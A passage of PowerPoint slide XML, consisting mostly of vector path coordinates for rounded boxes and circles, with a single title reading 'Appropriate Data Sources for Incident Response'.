                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405763" y="4032253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364349" y="4012192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324553" y="3989477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286488" y="3964223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250270" y="3936545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216015" y="3906559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183838" y="3874380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153854" y="3840124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126178" y="3803905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100926" y="3765840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78213" y="3726043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58154" y="3684631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40865" y="3641717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26461" y="3597419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15057" y="3551850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6769" y="3505127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711" y="3457365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3408679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="681736"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="42709B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60672" y="4258436"/>
            <a:ext cx="853186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5"/>
              <a:t>Appropriate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105"/>
              <a:t>Sources</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="95"/>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125"/>
              <a:t>Response</a:t>
            </a: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32647" y="5736335"/>
            <a:ext cx="2440305" cy="2962910"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2440304" h="2962909">
                <a:moveTo>
                  <a:pt x="1508505" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="332867" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283980" y="3688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237219" y="14393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193117" y="31574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152208" y="54691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115024" y="83203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82099" y="116570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53964" y="154251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31154" y="195707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14201" y="240395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3639" y="287777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="337312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2962656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21462" y="2962656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21462" y="1964182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24842" y="1917586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34659" y="1873100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45409" y="1844548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21462" y="1844548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21462" y="337312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24842" y="290716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34659" y="246230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50430" y="204343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71670" y="165547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97896" y="130332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128625" y="99188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163371" y="72607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201653" y="51078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242985" y="35093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286884" y="25142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332867" y="21716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508505" y="21716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1508505" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2440304" h="2962909">
                <a:moveTo>
                  <a:pt x="2439924" y="1626870"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="332867" y="1626870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280632" y="1630977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231007" y="1642897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184587" y="1662023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141970" y="1687750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103752" y="1719472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70530" y="1756582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42901" y="1798476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21462" y="1844548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45409" y="1844548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50430" y="1831213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71670" y="1792417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97896" y="1757202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128625" y="1726058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163371" y="1699477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="201653" y="1677948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242985" y="1661963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286884" y="1652012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332867" y="1648587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439924" y="1648587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439924" y="1626870"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="313E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034528" y="4373879"/>
            <a:ext cx="22860" cy="4325620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="22859" h="4325620">
                <a:moveTo>
                  <a:pt x="22859" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4325112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22859" y="4325112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22859" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="313E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00572" y="5527547"/>
            <a:ext cx="1780539" cy="3171825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1780540" h="3171825">
                <a:moveTo>
                  <a:pt x="1584960" y="2048649"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1581315" y="1999107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1570761" y="1951736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1553832" y="1907057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1531035" y="1865617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502930" y="1827961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1470037" y="1794611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1432902" y="1766112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1392034" y="1743011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1347990" y="1725841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301292" y="1715147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1252474" y="1711452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1711452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1733169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1252474" y="1733169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1298384" y="1736598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342224" y="1746542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1383499" y="1762518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1421739" y="1784032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1456436" y="1810588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1487131" y="1841715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1513332" y="1876920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1534553" y="1915693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1550301" y="1957578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1560118" y="2002053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1563497" y="2048637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1563497" y="3171444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1584960" y="3171444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1584960" y="2048649"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1780540" h="3171825">
                <a:moveTo>
                  <a:pt x="1780032" y="337312"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1776450" y="287756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1766062" y="240360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749386" y="195656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726907" y="154203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1699145" y="116522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1666608" y="83172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629803" y="54660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589239" y="31559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1545424" y="14389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498866" y="3695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1450086" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1524" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1524" y="21717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1450086" y="21717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1495361" y="25146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1538681" y="35102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1579549" y="51079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1617459" y="72618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651927" y="99199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1682445" y="130340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1708531" y="165557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1729676" y="204355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1745399" y="246240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1755190" y="290728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1758569" y="337312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1758569" y="3171456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780032" y="3171444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1780032" y="337312"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="313E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282428" y="6995159"/>
            <a:ext cx="780415" cy="791210"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="780415" h="791209">
                <a:moveTo>
                  <a:pt x="390144" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="341195" y="3080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294064" y="12076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249115" y="26617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206713" y="46331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167225" y="70850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131014" y="99801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98446" y="132815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69887" y="169522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45701" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26255" y="252531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11912" y="298093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038" y="345865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="395478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038" y="445090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11912" y="492862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26255" y="538424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45701" y="581404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69887" y="621433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98446" y="658140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131014" y="691154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167225" y="720105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206713" y="744624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249115" y="764338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294064" y="778879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341195" y="787875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390144" y="790956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439092" y="787875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486223" y="778879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531172" y="764338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573574" y="744624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613062" y="720105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649273" y="691154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681841" y="658140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710400" y="621433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734586" y="581404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754032" y="538424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768375" y="492862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777249" y="445090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780288" y="395478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777249" y="345865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="768375" y="298093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754032" y="252531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="734586" y="209551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="710400" y="169522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="681841" y="132815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649273" y="99801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613062" y="70850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573574" y="46331"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531172" y="26617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486223" y="12076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439092" y="3080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390144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279635" y="5309615"/>
            <a:ext cx="782320" cy="792480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="782320" h="792479">
                <a:moveTo>
                  <a:pt x="390906" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="341869" y="3087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294651" y="12102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249618" y="26673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207135" y="46428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167569" y="70997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131286" y="100007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98652" y="133087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70034" y="169866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45799" y="209972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26311" y="253034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11938" y="298680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3045" y="346539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="396239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3045" y="445940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11938" y="493799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26311" y="539445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45799" y="582507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70034" y="622613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98652" y="659392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131286" y="692472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167569" y="721482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207135" y="746051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249618" y="765806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294651" y="780377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341869" y="789392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390906" y="792480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439942" y="789392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487160" y="780377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532193" y="765806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574676" y="746051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614242" y="721482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650525" y="692472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="683159" y="659392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711777" y="622613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736012" y="582507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755500" y="539445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="769873" y="493799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778766" y="445940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="781812" y="396239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="778766" y="346539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="769873" y="298680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755500" y="253034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="736012" y="209972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711777" y="169866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="683159" y="133087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650525" y="100007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="614242" y="70997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574676" y="46428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532193" y="26673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487160" y="12102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439942" y="3087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390906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36764" y="3767328"/>
            <a:ext cx="858519" cy="871855"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="858520" h="871854">
                <a:moveTo>
                  <a:pt x="429005" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="382252" y="2558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336959" y="10055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293388" y="22226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251800" y="38803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212456" y="59520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175619" y="84112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141550" y="112312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110509" y="143854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82759" y="178472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58561" y="215900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38176" y="255870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21866" y="298118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9892" y="342377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2516" y="388381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="435863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2516" y="483346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9892" y="529350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21866" y="573609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38176" y="615857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58561" y="655827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82759" y="693255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110509" y="727873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141550" y="759415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175619" y="787615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212456" y="812207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251800" y="832924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293388" y="849501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336959" y="861672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382252" y="869169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429005" y="871727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475759" y="869169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521052" y="861672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564623" y="849501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="606211" y="832924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645555" y="812207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682392" y="787615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716461" y="759415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747502" y="727873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775252" y="693255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="799450" y="655827"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="819835" y="615857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836145" y="573609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848119" y="529350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855495" y="483346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="858011" y="435863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855495" y="388381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848119" y="342377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836145" y="298118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="819835" y="255870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="799450" y="215900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775252" y="178472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747502" y="143854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716461" y="112312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682392" y="84112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="645555" y="59520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="606211" y="38803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564623" y="22226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521052" y="10055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475759" y="2558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429005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657088" y="5146547"/>
            <a:ext cx="780415" cy="792480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="780414" h="792479">
                <a:moveTo>
                  <a:pt x="390144" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="341195" y="3087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294064" y="12102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249115" y="26673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206713" y="46428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167225" y="70997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131014" y="100007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98446" y="133087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69887" y="169866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45701" y="209972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26255" y="253034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11912" y="298680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038" y="346539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="396239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3038" y="445940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11912" y="493799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26255" y="539445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45701" y="582507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69887" y="622613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98446" y="659392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131014" y="692472"/>
